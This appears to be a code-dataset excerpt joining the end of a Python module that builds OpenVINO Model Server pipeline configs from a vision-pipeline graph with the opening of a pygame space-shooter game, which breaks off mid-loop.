os\nimport subprocess\n\nimport networkx\n\nfrom . import ovms\nfrom . import voe\n\n#from IPython import embed\n\n# FIXME\nROOT = '/workspace'\n\n# uncomment these for running at local\n#ROOT = '/tmp/workspace'\n#subprocess.run(['mkdir', '-p', '/tmp/workspace'])\n#subprocess.run(['mkdir', '-p', '/tmp/workspace/tmp'])\n\n\nMODEL_DIR = ROOT\nLIB_DIR = ROOT + '/lib'\nTMP_DIR = ROOT + '/tmp'\n\n\ndef load_voe_config_from_dict(j):\n voe_config = voe.VoeConfig(**j)\n return voe_config\n\ndef load_voe_config_from_json(j):\n voe_config = voe.VoeConfig(**json.loads(j))\n return voe_config\n\ndef _get_node_from_graph(node_id, g):\n return g.nodes.get(node_id)['data']\n\ndef _get_edge_from_graph(parent_id, node_id, g):\n return g.edges.get((parent_id, node_id))['data']\n\ndef process_source(node, voe_config):\n return node.outputs[0].name\n\ndef process_openvino_model(node, g):\n\n model_config = ovms.ModelConfig(\n name=node.name,\n base_path=MODEL_DIR+'/'+node.openvino_model_name\n \n )\n\n #\n # Download Model\n #\n model_name = node.openvino_model_name\n need_download = True\n if os.path.isdir(MODEL_DIR+'/'+model_name):\n if os.path.isfile(MODEL_DIR+'/'+model_name+'/1/'+model_name+'.xml') and os.path.isfile(MODEL_DIR+'/'+model_name+'/1/'+model_name+'.bin'):\n need_download = False\n else:\n subprocess.run(['rm', '-rf', MODEL_DIR+'/'+model_name])\n\n if need_download:\n subprocess.run(['python', 'downloader/tools/downloader/downloader.py ', '-o', TMP_DIR, '--name', model_name, '--precision', 'FP32'])\n subprocess.run(['mkdir', '-p', MODEL_DIR+'/'+model_name])\n subprocess.run(['mkdir', '-p', MODEL_DIR+'/'+model_name+'/1'])\n subprocess.run(['mv', TMP_DIR+'/intel/'+model_name+'/FP32/'+model_name+'.xml', MODEL_DIR+'/'+model_name+'/1/'+model_name+'.xml'])\n subprocess.run(['mv', TMP_DIR+'/intel/'+model_name+'/FP32/'+model_name+'.xml', MODEL_DIR+'/'+model_name+'/1/'+model_name+'.bin'])\n\n \n if node.inputs[0].metadata['type'] != 'image': raise Exception('Not a model')\n\n model_config.shape = '('+', '.join(str(n) for n in node.inputs[0].metadata['shape'])+')'\n model_config.layout = ''.join(node.inputs[0].metadata['layout'])\n\n\n metadatas = {node.name: {}}\n\n outputs = []\n for output in node.outputs:\n outputs.append(ovms.PipelineConfigNodeOutput(\n data_item=output.name,\n alias=output.name\n ))\n\n\n # FIXME intel openvino detection model label begin with 1 ...\n # Need to find a better way to embed this policy\n ##########################################################\n if output.metadata['type'] == 'bounding_box':\n output.metadata['labels'] = ['']+output.metadata['labels']\n ##########################################################\n\n\n\n metadatas[node.name][output.name] = output.metadata\n\n inputs = []\n for input in node.inputs:\n found_parent = False\n for parent_id in g.predecessors(node.node_id):\n parent_node = _get_node_from_graph(parent_id, g)\n edge = _get_edge_from_graph(parent_id, node.node_id, g)\n if input.name == edge.target.input_name:\n found_parent = True\n\n inputs.append(\n {input.name: ovms.PipelineConfigNodeInput(\n node_name=parent_node.name,\n data_item=edge.source.output_name)\n }\n )\n\n break\n\n if not found_parent: raise Exception('Unfulfilled inputs')\n\n pipeline_config_node = ovms.PipelineConfigModelNode(\n name=node.name,\n #model_name=node.openvino_model_name,\n model_name=node.name,\n type='DL model',\n inputs=inputs,\n outputs=outputs)\n\n return model_config, pipeline_config_node, metadatas\n\ndef process_customvision_model(node, g):\n\n model_name = node.download_uri_openvino.split('/')[3][2:]\n iteration_id = node.download_uri_openvino.split('/')[4].split('.')[0]\n\n #\n # Download Model\n #\n file_name = ROOT + '/' + iteration_id + '.zip'\n if os.path.isfile(file_name):\n # customvision model already downloaded\n subprocess.run(['cp', file_name, TMP_DIR+'/model.zip'])\n else:\n # customvision not yet downloaded\n subprocess.run(['wget', '-O', TMP_DIR+'/model.zip', node.download_uri_openvino])\n \n subprocess.run(['unzip', '-o', TMP_DIR+'/model.zip', '-d', TMP_DIR])\n subprocess.run(['mkdir', '-p', MODEL_DIR+'/'+model_name])\n subprocess.run(['mkdir', '-p', MODEL_DIR+'/'+model_name+'/1'])\n subprocess.run(['mv', TMP_DIR+'/model.xml', MODEL_DIR+'/'+model_name+'/1/'+model_name+'.xml'])\n subprocess.run(['mv', TMP_DIR+'/model.bin', MODEL_DIR+'/'+model_name+'/1/'+model_name+'.bin'])\n\n if node.inputs[0].metadata['type'] != 'image': raise Exception('Not a model')\n\n\n model_configs = [] \n cv_pre_model_config = ovms.ModelConfig(\n name='cv_pre',\n base_path=MODEL_DIR+'/cv_pre',\n shape='('+', '.join(str(n) for n in node.inputs[0].metadata['shape'])+')',\n layout=''.join(node.inputs[0].metadata['layout'])\n )\n\n cv_model_config = ovms.ModelConfig(\n name=node.name,\n base_path=MODEL_DIR+'/'+model_name,\n shape='('+', '.join(str(n) for n in node.inputs[0].metadata['shape'])+')',\n #layout=''.join(node.inputs[0].metadata['layout'])\n layout='NCHW'\n )\n\n cv_post_model_config = ovms.ModelConfig(\n name='cv_post',\n base_path=MODEL_DIR+'/cv_post',\n )\n\n model_configs = [cv_pre_model_config, cv_model_config, cv_post_model_config]\n\n \n cv_post_outputs = []\n metadatas = {node.name: {}}\n for output in node.outputs:\n cv_post_outputs.append(ovms.PipelineConfigNodeOutput(\n data_item='PartitionedCall/model/detection_out/concat',\n alias=output.name\n ))\n\n metadatas[node.name][output.name] = output.metadata\n\n cv_pre_inputs = []\n for input in node.inputs:\n found_parent = False\n for parent_id in g.predecessors(node.node_id):\n parent_node = _get_node_from_graph(parent_id, g)\n edge = _get_edge_from_graph(parent_id, node.node_id, g)\n if input.name == edge.target.input_name:\n found_parent = True\n\n cv_pre_inputs.append(\n {'image': ovms.PipelineConfigNodeInput(\n node_name=parent_node.name,\n data_item=edge.source.output_name)\n }\n )\n\n break\n\n if not found_parent: raise Exception('Unfulfilled inputs')\n\n cv_pre_pipeline_config_node = ovms.PipelineConfigModelNode(\n name='cv_pre',\n model_name='cv_pre',\n type='DL model',\n inputs=cv_pre_inputs,\n outputs=[\n ovms.PipelineConfigNodeOutput(\n data_item='PartitionedCall/model/image_out/mul',\n alias='image')\n ]\n )\n\n cv_pipeline_config_node = ovms.PipelineConfigModelNode(\n name=node.name,\n model_name=node.name,\n type='DL model',\n inputs=[\n {'data': ovms.PipelineConfigNodeInput(\n node_name='cv_pre',\n data_item='image')},\n ],\n outputs=[\n ovms.PipelineConfigNodeOutput(\n data_item='detected_classes',\n alias='detected_classes'),\n ovms.PipelineConfigNodeOutput(\n data_item='detected_scores',\n alias='detected_scores'),\n ovms.PipelineConfigNodeOutput(\n data_item='detected_boxes',\n alias='detected_boxes'),\n ]\n )\n\n cv_post_pipeline_config_node = ovms.PipelineConfigModelNode(\n name='cv_post',\n model_name='cv_post',\n type='DL model',\n inputs=[\n {'detected_classes': ovms.PipelineConfigNodeInput(\n node_name=node.name,\n data_item='detected_classes')},\n {'detected_scores': ovms.PipelineConfigNodeInput(\n node_name=node.name,\n data_item='detected_scores')},\n {'detected_boxes': ovms.PipelineConfigNodeInput(\n node_name=node.name,\n data_item='detected_boxes')},\n ],\n outputs=cv_post_outputs,\n )\n\n pipeline_config_nodes = [cv_pre_pipeline_config_node, cv_pipeline_config_node, cv_post_pipeline_config_node]\n \n\n return model_configs, pipeline_config_nodes, metadatas\n\n\ndef process_openvino_library(node, g): \n\n library_config = ovms.CustomNodeLibraryConfig(\n name=node.name,\n base_path=LIB_DIR+'/'+node.openvino_library_name\n )\n \n outputs = []\n for output in node.outputs:\n outputs.append(ovms.PipelineConfigNodeOutput(\n data_item=output.name,\n alias=output.name\n ))\n\n inputs = []\n for input in node.inputs:\n found_parent = False\n for parent_id in g.predecessors(node.node_id):\n parent_node = _get_node_from_graph(parent_id, g)\n edge = _get_edge_from_graph(parent_id, node.node_id, g)\n if input.name == edge.target.input_name:\n found_parent = True\n\n # FIXME\n parent_node_name = parent_node.name\n if parent_node.type == 'customvision_model':\n parent_node_name = 'cv_post'\n\n # FIXME better move this policy to front-end\n if parent_node.type == 'openvino_model':\n if node.params['filter_label_id'] != '-1':\n node.params['filter_label_id'] = str(int(node.params['filter_label_id'])+1)\n\n inputs.append(\n {input.name: ovms.PipelineConfigNodeInput(\n node_name=parent_node_name,\n data_item=edge.source.output_name)\n }\n )\n\n break\n\n if not found_parent: raise Exception('Unfulfilled inputs')\n\n\n pipeline_config_node = ovms.PipelineConfigCustomNode(\n name=node.name,\n #library_name=node.openvino_library_name,\n library_name=node.name,\n type='custom',\n inputs=inputs,\n outputs=outputs,\n demultiply_count=0,\n params=node.params,\n )\n\n return library_config, pipeline_config_node\n\ndef process_sink(node, g):\n parent_id = next(g.predecessors(node.node_id))\n parent_node = _get_node_from_graph(parent_id, g)\n edge = _get_edge_from_graph(parent_id, node.node_id, g)\n \n ret = {\n node.name: ovms.PipelineConfigOutput(\n node_name=parent_node.name,\n data_item=edge.source.output_name,\n )\n }\n return ret\n\n\ndef voe_config_to_ovms_config(voe_config,\n name,\n model_dir=MODEL_DIR,\n lib_dir=LIB_DIR):\n\n g = networkx.DiGraph()\n\n\n for node in voe_config.nodes:\n g.add_node(node.node_id, data=node)\n\n for edge in voe_config.edges:\n # Add some validation here FIXME\n g.add_edge(\n edge.source.node_id,\n edge.target.node_id,\n data=edge\n )\n\n ori_metadatas = {}\n\n model_config_list = []\n library_config_list = []\n pipeline_config = {\n 'name': name,\n 'inputs': [],\n 'nodes': [],\n 'outputs': []\n }\n\n #from IPython import embed; embed()\n for node_id in networkx.topological_sort(g):\n node = g.nodes[node_id]['data']\n if node.type == 'source':\n input = process_source(node, g)\n pipeline_config['inputs'].append(input)\n\n elif node.type == 'openvino_model':\n model_config, pipeline_config_node, _metadatas = process_openvino_model(node, g)\n model_config_list.append({'config': model_config})\n pipeline_config['nodes'].append(pipeline_config_node)\n ori_metadatas.update(_metadatas)\n\n elif node.type == 'openvino_library':\n library_config, pipeline_config_node = process_openvino_library(node, g)\n library_config_list.append(library_config)\n pipeline_config['nodes'].append(pipeline_config_node)\n\n # hack FIXME\n if node.name == 'Crop & Filter':\n pipeline_config['outputs'].append({\n 'confidences': ovms.PipelineConfigOutput(\n node_name=node.name,\n data_item='confidences'\n )})\n pipeline_config['outputs'].append({\n 'coordinates': ovms.PipelineConfigOutput(\n node_name=node.name,\n data_item='coordinates'\n )})\n pipeline_config['outputs'].append({\n 'label_ids': ovms.PipelineConfigOutput(\n node_name=node.name,\n data_item='label_ids'\n )})\n\n elif node.type == 'customvision_model':\n model_configs, pipeline_config_nodes, _metadatas = process_customvision_model(node, g)\n for model_config in model_configs:\n model_config_list.append({'config': model_config})\n pipeline_config['nodes'] += pipeline_config_nodes\n ori_metadatas.update(_metadatas)\n\n\n elif node.type == 'sink':\n output = process_sink(node, g)\n pipeline_config['outputs'].append(output)\n \n else:\n raise Exception('Unknown Node Type', node.type)\n #import pprint\n #pprint.pprint(model_config_list) \n #pprint.pprint(pipeline_config) \n #from IPython import embed; embed()\n ovms_config = ovms.Config(\n model_config_list=model_config_list,\n custom_node_library_config_list=library_config_list,\n pipeline_config_list=[pipeline_config]\n )\n\n #FIXME\n detection_metadata = None\n for node in ori_metadatas:\n for output_name in ori_metadatas[node]:\n if ori_metadatas[node][output_name]['type'] == 'bounding_box':\n detection_metadata = ori_metadatas[node][output_name]\n\n metadatas = {} \n if len(ovms_config.pipeline_config_list) > 0:\n for output in ovms_config.pipeline_config_list[0].outputs:\n for k, v in output.items():\n if v.node_name in ori_metadatas:\n if v.data_item in ori_metadatas[v.node_name]:\n metadatas[k] = ori_metadatas[v.node_name][v.data_item]\n\n # FIXME\n elif v.data_item == 'label_ids' and detection_metadata is not None:\n metadatas[k] = detection_metadata\n\n return ovms_config, metadatas\n\nif __name__ == '__main__':\n j = json.load(open('cascade/test/voe_config.json'))\n voe_config = load_voe_config_from_dict(j)\n c, metadatas = voe_config_to_ovms_config(voe_config, 'wew')\n #json.dump(c.dict(exclude_none=True), open('cascade/test/ovms_config2.json', 'w+'))\n #import pprint\n #pprint.pprint(c.dict())\n #from IPython import embed; embed()\n print(metadatas)\n\n\n\n\n\n\n \n","sub_path":"factory-ai-vision/EdgeSolution/modules/ModelManagerModule/app/cascade/voe_to_ovms.py","file_name":"voe_to_ovms.py","file_ext":"py","file_size_in_byte":15256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"296644558","text":"#pythonDefender Beta 0.1\r\n#Copyright (c) 2012, RevertedSoft\r\n#All rights reserved.\r\n#\r\n#Redistribution and use in source and binary forms, with or without\r\n#modification, are permitted provided that the following conditions are met: \r\n#\r\n#1. Redistributions of source code must retain the above copyright notice, this\r\n# list of conditions and the following disclaimer. \r\n#2. Redistributions in binary form must reproduce the above copyright notice,\r\n# this list of conditions and the following disclaimer in the documentation\r\n# and/or other materials provided with the distribution. \r\n#\r\n#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\r\n#ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\r\n#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\r\n#DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR\r\n#ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\r\n#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\r\n#LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\r\n#ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\r\n#(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\r\n#SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\r\n\r\nimport pygame, sys, random, os\r\nfrom pygame.locals import *\r\n\r\ndef drawText(text, font, surface, x, y, color):\r\n textobj = font.render(text, 1, color)\r\n textrect = textobj.get_rect()\r\n textrect.topleft = (x, y)\r\n surface.blit(textobj, textrect)\r\n\r\ndef terminate():\r\n pygame.quit()\r\n sys.exit()\r\n\r\ndef waitForPlayerToPressKey():\r\n while True:\r\n if gameLoop == 1:\r\n drawText('Press SPACE to continue . . .', font, windowSurface, round((WINDOWWIDTH / 3)) + 20, round((WINDOWHEIGHT / 2)), GREEN)\r\n pygame.display.update()\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n terminate()\r\n\r\n if event.type == KEYDOWN:\r\n if event.key == K_SPACE:\r\n return\r\n\r\n if event.type == KEYUP:\r\n if event.key == K_ESCAPE or event.key == ord('q'):\r\n terminate()\r\n\r\n if event.key == K_i:\r\n instructions()\r\n return\r\n\r\ndef instructions():\r\n windowSurface.fill(BLACK)\r\n instructionsOn = True\r\n while instructionsOn:\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n terminate()\r\n \r\n drawText('INSTRUCTIONS', font, windowSurface, round(WINDOWWIDTH/2) - 40, 5, GREEN)\r\n drawText('Use the and arrow keys to maneuver your ship.', font, windowSurface, 1, 21, GREEN)\r\n drawText('Use the to fire your cannons.', font, windowSurface, 1, 36, GREEN)\r\n drawText('Press the key at any time to open the shop.', font, windowSurface, 1, 51, GREEN)\r\n drawText('Purchase upgrades with the mouse.', font, windowSurface, 1, 66, GREEN)\r\n drawText('Press space to continue. . .', font, windowSurface, 1, 81, GREEN)\r\n pygame.display.update()\r\n\r\n waitForPlayerToPressKey()\r\n\r\n\r\n return\r\n \r\n\r\n# set up pygame\r\npygame.init()\r\nmainClock = pygame.time.Clock()\r\n\r\n# set up the window\r\nWINDOWWIDTH = 400\r\nWINDOWHEIGHT = 800\r\npygame.display.set_icon(pygame.image.load('Images' + os.sep + 'playerShip.png'))\r\nwindowSurface = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT), pygame.FULLSCREEN)\r\npygame.display.set_caption('pythonDefender')\r\n\r\n# set up the background and sprites\r\nbackgroundImage = pygame.image.load('Images' + os.sep + 'pythonDefenderBackground.jpg')\r\nbackgroundRect = pygame.transform.scale(backgroundImage, (WINDOWWIDTH, WINDOWHEIGHT))\r\n\r\nenemyImage = pygame.image.load('Images' + os.sep + 'enemyDrone.png')\r\nenemyImageFlipped = pygame.transform.flip(enemyImage, False, True)\r\n\r\nplayerBulletImage = pygame.image.load('Images' + os.sep + 'Bullet.png')\r\n\r\nplayerShipImage = pygame.image.load('Images' + os.sep + 'playerShip.png')\r\n\r\nenemyBulletImage = pygame.image.load('Images' + os.sep + 'enemyBullet.png')\r\n\r\n# setup speed variables\r\nplayerSpeed = 10\r\ncompSpeed = 6\r\n\r\n# setup movement variables\r\nRIGHT = 6\r\nLEFT = 4\r\n\r\n# set up the colors\r\nBLACK = (0,0,0)\r\nWHITE = (255,255,255)\r\nGREY = (128,128,128)\r\nDARKGREY = (52,52,52)\r\nRED = (255,0,0)\r\nGREEN = (0,255,0)\r\nLIGHTBLUE = (0,255,255)\r\nTURQUOISE = (0,255,126)\r\nBLUE = (0,0,255)\r\nYELLOW = (255,255,0)\r\nORANGE = (255,126,0)\r\nPURPLE = (255,0,255)\r\nDEEPPURPLE = (128,0,128)\r\n\r\n# set up the font\r\nfont = pygame.font.SysFont(None, 18)\r\nsmallFont = pygame.font.SysFont(None, 14)\r\n\r\n\r\n#-----------------------------------DEFENDER-----------------------------------#\r\n\r\n\r\n# Run the game loops\r\nwhile True:\r\n\r\n gameLoop = 0\r\n\r\n # Welcome loop\r\n\r\n # display the welcome screen\r\n windowSurface.fill(BLACK)\r\n drawText('pythonDefender', font, windowSurface, (WINDOWWIDTH / 3), (WINDOWHEIGHT / 2), GREEN)\r\n drawText('Press space to start, or ESCAPE to exit.', font, windowSurface, ((WINDOWWIDTH / 4) - 20), (WINDOWHEIGHT / 2) + 30, GREEN)\r\n drawText('Press for instructions.', font, windowSurface, ((WINDOWWIDTH / 4) - 20), (WINDOWHEIGHT / 2) + 45, GREEN)\r\n pygame.display.update()\r\n\r\n # wait for player to press key to continue\r\n waitForPlayerToPressKey()\r\n\r\n while True:\r\n\r\n # Setup loop\r\n\r\n # setup player ship, computer ships, and bullets\r\n playerAlive = True\r\n playerShopOpen = False\r\n dashBoard = pygame.Rect(0, (WINDOWHEIGHT - 45), WINDOWWIDTH, 45)\r\n playerScore = 0\r\n playerCredits = 0\r\n playerWidth = 12\r\n playerHeight = 16\r\n shieldSpaceSide = (playerWidth)\r\n shieldSpaceTop = (playerHeight / 2)\r\n shieldRadius = (float(playerHeight) * 1.5)\r\n playerSpeed = 10 \r\n playerBulletSpeed = 15\r\n playerShip = {'rect':pygame.Rect((WINDOWWIDTH / 2) - (playerWidth / 2), (dashBoard.top - playerHeight - shieldSpaceTop - 10), playerWidth, playerHeight),\r\n 'speed':playerSpeed,\r\n 'surface':pygame.transform.scale(playerShipImage, ((playerWidth*2), (playerHeight*2)))}\r\n playerShield = pygame.Rect((playerShip['rect'].left - shieldSpaceSide), (playerShip['rect'].top - shieldSpaceTop), ((playerWidth + shieldSpaceSide * 2)), ((playerHeight + shieldSpaceTop * 2)))\r\n shieldImage = pygame.image.load('Images\\\\shieldSprite.png')\r\n shieldRect = pygame.transform.scale(shieldImage, ((int(shieldRadius*2)), (int(shieldRadius*2))))\r\n playerShieldHealth = 2\r\n playerShieldRegenRate = 0\r\n playerShieldRegenThresh = 400 # number of ticks before 1 point of shield regenerates\r\n playerShieldMax = 2\r\n playerBullets = []\r\n playerBulletWidth = 2\r\n playerBulletHeight = 4\r\n # setup players superweapon\r\n playerLaserWidth = 1\r\n playerLaserCurrentReload = 0\r\n playerLaserReload = 500\r\n playerLaserCurrentDuration = 0\r\n playerLaserDuration = 0\r\n playerLaserOwned = False\r\n playerLaserOn = False\r\n playerLaserTry = False\r\n extensionValue = 0\r\n playerLaserList = []\r\n \r\n currentReload = 0\r\n reload = 20 # number of ticks before a player can fire again, upgrades available to increase speed\r\n reloadUpgradeCount = 0\r\n reloadUpgradeMax = 10\r\n cannonSizeUpgradeCount = 0\r\n cannonSizeUpgradeMax = 5\r\n maxShieldUpgradeCount = 0\r\n maxShieldUpgradeMax = 6\r\n shieldRegenUpgradeCount = 0\r\n shieldRegenUpgradeMax = 18\r\n laserUpgradeCount = 0\r\n laserUpgradeMax = 5\r\n \r\n computerShipWidth = 11\r\n computerShipHeight = 15\r\n computerSize = 20\r\n computerStartPositionX = 1\r\n computerStartPositionY = 1\r\n computerSpeed = 4\r\n computerReload = 33\r\n computerBulletSpeed = 12\r\n computerBulletWidth = 1\r\n computerBulletHeight = 3\r\n computerShips = []\r\n addComputerShip = 15\r\n addComputerIncrement = 100 # number of ticks between enemy ship spawns\r\n computerBullets = []\r\n spawnRate = 2000 # number of ticks before the spawn rate is increased, also conected to wave\r\n bulletInflator = 2 # number of spawn cycles before computer bullet size is increased\r\n wave = 1\r\n \r\n # setup player movement variables\r\n moveLeft = False\r\n moveRight = False\r\n addPlayerBullets = False\r\n\r\n while playerAlive:\r\n\r\n # Game loop\r\n\r\n # variable to prevent crash from two bullets hitting an enemy ship\r\n bulletHit = False\r\n\r\n # increase difficulty after wave 20\r\n if wave > 20:\r\n computerReload = 10\r\n computerBulletSpeed = 15\r\n computerSpeed = 7\r\n\r\n # check for the QUIT event\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n terminate()\r\n # check for keypress events\r\n if event.type == KEYDOWN:\r\n # change keyboard variables\r\n if event.key == K_LEFT or event.key == ord('a'):\r\n moveLeft = True\r\n moveRight = False\r\n if event.key == K_RIGHT or event.key == ord('d'):\r\n moveRight = True\r\n moveLeft = False\r\n if event.key == K_SPACE:\r\n addPlayerBullets = True\r\n playerLaserTry = True #REMOVE\r\n if event.key == ord('p'):\r\n waitForPlayerToPressKey()\r\n \r\n # check for shop open\r\n if event.key == ord('s'):\r\n playerShopOpen = True\r\n \r\n if event.type == KEYUP:\r\n if event.key == K_ESCAPE or event.key == ord('q'):\r\n terminate()\r\n if event.key == K_LEFT or event.key == ord('a'):\r\n moveLeft = False\r\n if event.key == K_RIGHT or event.key == ord('d'):\r\n moveRight = False\r\n if event.key == K_SPACE:\r\n addPlayerBullets = False\r\n playerLaserTry = False\r\n\r\n # handle the player shop\r\n while playerShopOpen:\r\n\r\n # set up player mouse position to handle button clicks\r\n mousePos = pygame.mouse.get_pos()\r\n\r\n # set up the button column\r\n buttonX = 175\r\n\r\n # set up the costs and increase value as purchased\r\n reloadUpgradeCost = ((reloadUpgradeCount * 1500) + 1500)\r\n cannonSizeUpgradeCost = ((cannonSizeUpgradeCount * 2000) + 2000)\r\n maxShieldUpgradeCost = ((maxShieldUpgradeCount * 2000) + 2000)\r\n shieldRegenUpgradeCost = ((shieldRegenUpgradeCount * 500) + 500)\r\n laserUpgradeCost = ((laserUpgradeCount * 25000) + 25000)\r\n\r\n # check for the QUIT event\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n terminate()\r\n\r\n # check for mouse button events, and handle appropriately if a button is clicked\r\n if event.type == MOUSEBUTTONDOWN:\r\n if event.button == 1:\r\n if reloadUpgrade.collidepoint(mousePos) and reloadUpgradeCount <= reloadUpgradeMax and playerCredits >= reloadUpgradeCost:\r\n reload -= 1\r\n playerCredits -= reloadUpgradeCost\r\n reloadUpgradeCount += 1\r\n if cannonSizeUpgrade.collidepoint(mousePos) and cannonSizeUpgradeCount <= cannonSizeUpgradeMax and playerCredits >= cannonSizeUpgradeCost:\r\n playerBulletWidth += 1\r\n playerBulletHeight += 1\r\n playerCredits -= cannonSizeUpgradeCost\r\n cannonSizeUpgradeCount += 1\r\n if maxShieldUpgrade.collidepoint(mousePos) and maxShieldUpgradeCount <= maxShieldUpgradeMax and playerCredits >= maxShieldUpgradeCost:\r\n playerShieldMax += 1\r\n playerCredits -= maxShieldUpgradeCost\r\n maxShieldUpgradeCount += 1\r\n if shieldRegenUpgrade.collidepoint(mousePos) and shieldRegenUpgradeCount <= shieldRegenUpgradeMax and playerCredits >= shieldRegenUpgradeCost:\r\n playerShieldRegenThresh -= 20\r\n playerCredits -= shieldRegenUpgradeCost\r\n shieldRegenUpgradeCount += 1\r\n if laserUpgrade.collidepoint(mousePos) and laserUpgradeCount <= laserUpgradeMax and playerCredits >= laserUpgradeCost:\r\n playerLaserWidth += 1\r\n playerLaserReload -= 75\r\n playerLaserDuration += 20\r\n playerLaserCurrentDuration = playerLaserDuration\r\n playerCredits -= laserUpgradeCost\r\n laserUpgradeCount += 1\r\n playerLaserOwned = True\r\n \r\n # handle keypress events\r\n if event.type == KEYDOWN:\r\n if event.key == ord('s'):\r\n playerShopOpen = False\r\n if event.key == K_ESCAPE or event.key == ord('q'):\r\n terminate()\r\n \r\n # draw shop menu to screen \r\n windowSurface.fill(BLACK)\r\n reloadUpgrade = pygame.Rect(buttonX, 1, 10, 10)\r\n cannonSizeUpgrade = pygame.Rect(buttonX, (reloadUpgrade.bottom + 5), 10, 10)\r\n maxShieldUpgrade = pygame.Rect(buttonX, (cannonSizeUpgrade.bottom + 5), 10, 10)\r\n shieldRegenUpgrade = pygame.Rect(buttonX, (maxShieldUpgrade.bottom + 5), 10, 10)\r\n laserUpgrade = pygame.Rect(buttonX, (shieldRegenUpgrade.bottom + 5), 10, 10)\r\n\r\n # display the players credits\r\n drawText('Credits: $%s' % playerCredits, font, windowSurface, (WINDOWWIDTH / 2), 1, GREEN)\r\n\r\n # list the upgrades and draw their corresponding buttons\r\n drawText('Reload speed: $%s %s/%s' % (reloadUpgradeCost, reloadUpgradeCount, reloadUpgradeMax), font, windowSurface, 1, 1, RED)\r\n pygame.draw.rect(windowSurface, YELLOW, reloadUpgrade)\r\n drawText('Cannon size: $%s %s/%s' % (cannonSizeUpgradeCost, cannonSizeUpgradeCount, cannonSizeUpgradeMax), font, windowSurface, 1, 16, RED)\r\n pygame.draw.rect(windowSurface, YELLOW, cannonSizeUpgrade)\r\n drawText('Max shield: $%s %s/%s' % (maxShieldUpgradeCost, maxShieldUpgradeCount, maxShieldUpgradeMax), font, windowSurface, 1, 31, LIGHTBLUE)\r\n pygame.draw.rect(windowSurface, YELLOW, maxShieldUpgrade)\r\n drawText('Shield regen: $%s %s/%s' % (shieldRegenUpgradeCost, shieldRegenUpgradeCount, shieldRegenUpgradeMax), font, windowSurface, 1, 46, LIGHTBLUE)\r\n pygame.draw.rect(windowSurface, YELLOW, shieldRegenUpgrade)\r\n drawText('Laser Cannon: $%s %s/%s' % (laserUpgradeCost, laserUpgradeCount, laserUpgradeMax), font, windowSurface, 1, 61, PURPLE)\r\n pygame.draw.rect(windowSurface, YELLOW, laserUpgrade)\r\n \r\n pygame.display.update()\r\n\r\n # back to main game loop\r\n\r\n # add computer ship if ship counter is 0 or less\r\n if addComputerShip <= 0:\r\n # add a computer ship to the top left of screen\r\n newComputer = {'rect':pygame.Rect(computerStartPositionX, computerStartPositionY, computerShipWidth, computerShipHeight),\r\n 'dir':RIGHT,\r\n 'speed':computerSpeed,\r\n 'reload':computerReload,\r\n 'surface':pygame.transform.scale(enemyImageFlipped, (computerSize, computerSize))}\r\n computerShips.append(newComputer)\r\n addComputerShip = addComputerIncrement\r\n\r\n # move the player\r\n if moveLeft and playerShip['rect'].left > 0:\r\n playerShip['rect'].left -= playerShip['speed']\r\n playerShield.left -= playerShip['speed']\r\n if moveRight and playerShip['rect'].right < WINDOWWIDTH:\r\n playerShip['rect'].right += playerShip['speed']\r\n playerShield.right += playerShip['speed']\r\n\r\n # regenerate players shield\r\n if playerShieldRegenRate >= playerShieldRegenThresh and playerShieldHealth < playerShieldMax:\r\n playerShieldHealth += 1\r\n playerShieldRegenRate = 0\r\n\r\n # add player bullets if spacebar is down\r\n if addPlayerBullets and currentReload <= 0:\r\n # fire bullets from left and right of ship\r\n playerBullets.append(pygame.Rect(playerShip['rect'].right,playerShip['rect'].top,playerBulletWidth,playerBulletHeight))\r\n playerBullets.append(pygame.Rect(playerShip['rect'].left,playerShip['rect'].top,playerBulletWidth,playerBulletHeight))\r\n # reset the reload counter\r\n currentReload = reload\r\n \r\n # fire laser if upgrade was purchased\r\n if playerLaserTry or playerLaserOn:\r\n if playerLaserOwned and playerLaserCurrentReload <= 0 and playerLaserCurrentDuration >= 0:\r\n playerLaserOn = True\r\n if playerLaserCurrentDuration <= 0:\r\n playerLaserCurrentReload = playerLaserReload\r\n playerLaserCurrentDuration = playerLaserDuration\r\n playerLaserOn = False\r\n \r\n # move the players bullets\r\n for bullets in playerBullets[:]:\r\n bullets.top -= playerBulletSpeed\r\n\r\n # check if player laser collided with enemy ships\r\n for ships in computerShips[:]:\r\n for lasers in playerLaserList[:]: \r\n if lasers.colliderect(ships['rect']) and bulletHit == False:\r\n computerShips.remove(ships)\r\n playerScore += ((wave - 1) * 25) + 75\r\n playerCredits += ((wave - 1) * 25) + 75\r\n bulletHit = True\r\n\r\n # move the computers bullets\r\n for bullets in computerBullets[:]:\r\n bullets['rect'].top += computerBulletSpeed\r\n\r\n # move the players lasers\r\n if playerLaserOn:\r\n for lasers in playerLaserList[:]:\r\n lasers.left = playerShip['rect'].centerx\r\n\r\n # check if any computer ships have been hit by a player bullet\r\n for ships in computerShips[:]:\r\n for bullets in playerBullets[:]:\r\n if ships['rect'].colliderect(bullets) and bulletHit == False:\r\n playerBullets.remove(bullets)\r\n computerShips.remove(ships)\r\n playerScore += ((wave - 1) * 25) + 75\r\n playerCredits += ((wave - 1) * 25) + 75\r\n bulletHit = True\r\n\r\n # move the computer 